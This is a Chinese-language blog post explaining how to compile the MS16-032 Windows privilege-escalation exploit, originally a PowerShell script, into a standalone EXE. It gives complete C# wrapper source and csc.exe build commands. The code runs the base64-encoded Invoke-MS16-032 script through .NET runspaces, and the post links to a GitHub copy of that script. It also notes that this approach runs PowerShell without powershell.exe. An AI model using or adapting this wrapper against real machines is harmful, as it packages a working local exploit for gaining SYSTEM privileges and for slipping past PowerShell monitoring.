编译你的Powershell( MS16-032为例)

授人以鱼不如授人以渔

之前的MS16-032是个powershell脚本,怎么样改成exe呢,很简单。使用.net直接简单的修改编译就可以了。已经改好的代码在这里:

戳我

gist貌似被墙了,我在这里也贴一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
/*
Author: Evilcg, Twitter: @Evilcg
Step One:
PS C:\> [psobject].Assembly.Location
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs
*/

// Windows 10 reference may be Here: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35
using System;
using System.IO;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Text;
using System.Threading.Tasks;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;

namespace ConsoleApplication1
{
class Program
{
static string _application;
static string _commandline;
static int Main(string[] args)
{
if (args.Length == 0)
{
System.Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe \"/c clac.exe\"");
return 1;
}
else if (args.Length ==1)
{

_application = args[0];
PowerShellExecutor t = new PowerShellExecutor();
t.ExecuteSynchronously(_application, "");
}
else if(args.Length == 2)
{
_application = args[0];
_commandline = args[1];
PowerShellExecutor t = new PowerShellExecutor();
t.ExecuteSynchronously(_application, _commandline);
}
return 0;

}
}

class PowerShellExecutor
{
public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@""));
public void ExecuteSynchronously(string aplication,string commandline)
{
string Commandout;
InitialSessionState iss = InitialSessionState.CreateDefault();
Runspace rs = RunspaceFactory.CreateRunspace(iss);
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(PSInvoke_MS16_032);
if (commandline != "")
{
Commandout = "Invoke-MS16-032 -Application \"" + aplication + "\" -Commandline " + "\""+commandline+"\"";
}
else{
Commandout = "Invoke-MS16-032 -Application " + aplication;
}
Console.WriteLine(Commandout);
ps.AddScript(Commandout);
ps.AddCommand("Out-Default");
ps.Invoke();
rs.Close();
}
}
}

base64的内容是 https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 的所有内容的base64编码(你可以使用你自己的powershell脚本),由于我改的这个是有参数的,所以简单的写了上面的c#代码,通过.net来执行powershell。

编译需要System.Management.Automation.dll,具体步骤在cs文件里面已经写了,你们自己编译吧,只是对本机进行了测试,没测试别的,测试Demo如下:

http://static.wooyun.org/upload/image/201606/2016063013052815262.gif

通过.net来执行powershell,并不需要powershell.exe 。详情可以看一下 p0wnedShell 或者 http://zone.wooyun.org/content/26831

.net 2.0下编译的版本在这里

------本文结束,感谢阅读------